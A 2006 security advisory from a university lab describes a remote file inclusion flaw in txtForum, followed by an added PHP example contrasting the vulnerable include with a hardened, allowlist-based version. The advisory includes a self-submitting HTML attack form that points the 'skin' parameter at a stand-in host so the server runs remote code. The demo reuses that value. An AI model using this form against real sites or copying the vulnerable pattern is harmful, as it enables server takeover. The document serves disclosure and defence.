===========================================================
txtForum: Script Injection Vulnerability
===========================================================

Technical University of Vienna Security Advisory
TUVSA-0603-004, March 9, 2006

===========================================================

Affected applications
----------------------

txtForum (http://sourceforge.net/projects/txtforum1)
Versions 1.0.4-dev and prior.

Description
------------

There is an include statement in the file common.php on line 46 that
makes use of the SKIN constant, which was previously defined via the
$skin variable. Under the following conditions, an attacker can inject
arbitrary PHP script into the application:

- register_globals has to be active
- remote file inclusions have to be allowed

All the attacker has to do is find a path through the program that
doesn't initialize the $skin variable. The attacker does not require
access to an account in the forum.

Here is an example of an attack page:

<form action='http://localhost/txtforum104/login.php' method="post">
<input type="text" name="login_username" value="admin"/>
<input type="text" name="login_password" value="xyz"/>
<input type="text" name="skin" value="http://evilserver.com"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

This leads to execution of the code in http://evilserver.com/header.tpl.

There might be further possibilities for exploits (similar include
statements can also be found on lines 53 and 61).

Solution
---------

There is no solution to this issue yet.

Timeline:

March 2, 2006: Vulnerability reported to and acknowledged by the
developer (I.Konforti). A fix is not planned.
March 9, 2006: Advisory submission.

References
-----------

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-004.txt

Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at
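The Description section above names the two ingredients of the flaw: an include whose path is built from a $skin variable that some code paths never initialize, and a PHP configuration (register_globals, remote includes) that lets request input fill that variable with a URL. The following example is added here and is not txtForum's code; it reconstructs the assumed shape of the include (the exact statements in common.php are not on the page) and places a hardened version beside it. The skin directory layout, the function names and the request arrays are assumptions made for the demo.

```php
<?php
// Added example, not txtForum's own code. Reconstructs the shape of the
// include the advisory describes (common.php line 46: a SKIN value derived
// from $skin and then passed to include) and shows a hardened version.
// The original statements are assumed; only the pattern comes from the advisory.

// --- Vulnerable shape (assumed) ----------------------------------------------
// Nothing initialises $skin before it is used. With register_globals=On the
// request parameter "skin" lands in it, and with remote includes enabled a
// value such as "http://evilserver.com" makes PHP fetch and run .../header.tpl.
function skin_header_path_vulnerable(array $request): string
{
    extract($request);                 // emulates register_globals: $skin comes from the client
    return $skin . '/header.tpl';      // this string would be handed to include()
}

// --- Hardened version --------------------------------------------------------
// 1. $skin is always initialised from an explicit source, with a default.
// 2. The value must match a strict token pattern and name a directory that
//    actually exists under a fixed skin base path (an allowlist taken from disk).
// 3. The final path is resolved with realpath() and must stay inside the base,
//    so URLs and ../ sequences are rejected regardless of php.ini settings.
function skin_header_path_hardened(string $skinBase, array $request, string $default = 'default'): string
{
    $skin = $default;
    if (isset($request['skin']) && is_string($request['skin'])) {
        $skin = $request['skin'];
    }
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $skin)) {
        throw new InvalidArgumentException('invalid skin name');
    }
    $allowed = array_filter(scandir($skinBase), function ($d) use ($skinBase) {
        return $d[0] !== '.' && is_dir($skinBase . '/' . $d);
    });
    if (!in_array($skin, $allowed, true)) {
        throw new InvalidArgumentException('unknown skin');
    }
    $base = realpath($skinBase);
    $path = realpath($skinBase . '/' . $skin . '/header.tpl');
    if ($path === false || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('skin template outside skin directory');
    }
    return $path;                      // safe to use as the SKIN include path
}

// --- Demo: build a throwaway skin tree (constructed) and compare both ------
$base = sys_get_temp_dir() . '/txtforum_skins_' . getmypid();
mkdir($base . '/default', 0700, true);
file_put_contents($base . '/default/header.tpl', "<!-- default header -->\n");

$attack = ['skin' => 'http://evilserver.com'];   // the value from the advisory's form
echo "vulnerable: ", skin_header_path_vulnerable($attack), "\n";
// prints http://evilserver.com/header.tpl, i.e. a remote include target

foreach ([$attack, ['skin' => '../../etc'], ['skin' => 'nosuchskin'], [], ['skin' => 'default']] as $req) {
    try {
        echo "hardened:   ", skin_header_path_hardened($base, $req), "\n";
    } catch (Exception $e) {
        echo "hardened:   rejected (", $e->getMessage(), ")\n";
    }
}

unlink($base . '/default/header.tpl');
rmdir($base . '/default');
rmdir($base);
```

Only the last two requests (no skin parameter, and skin=default) resolve to a file under the skin base; the URL, the traversal attempt and the unknown name are rejected before any include runs. The hardened function does not rely on configuration: in later PHP releases register_globals was removed (5.4) and remote includes are governed by allow_url_include (5.2 onward), but validating the value and confining the resolved path closes the issue on the versions the advisory covers as well.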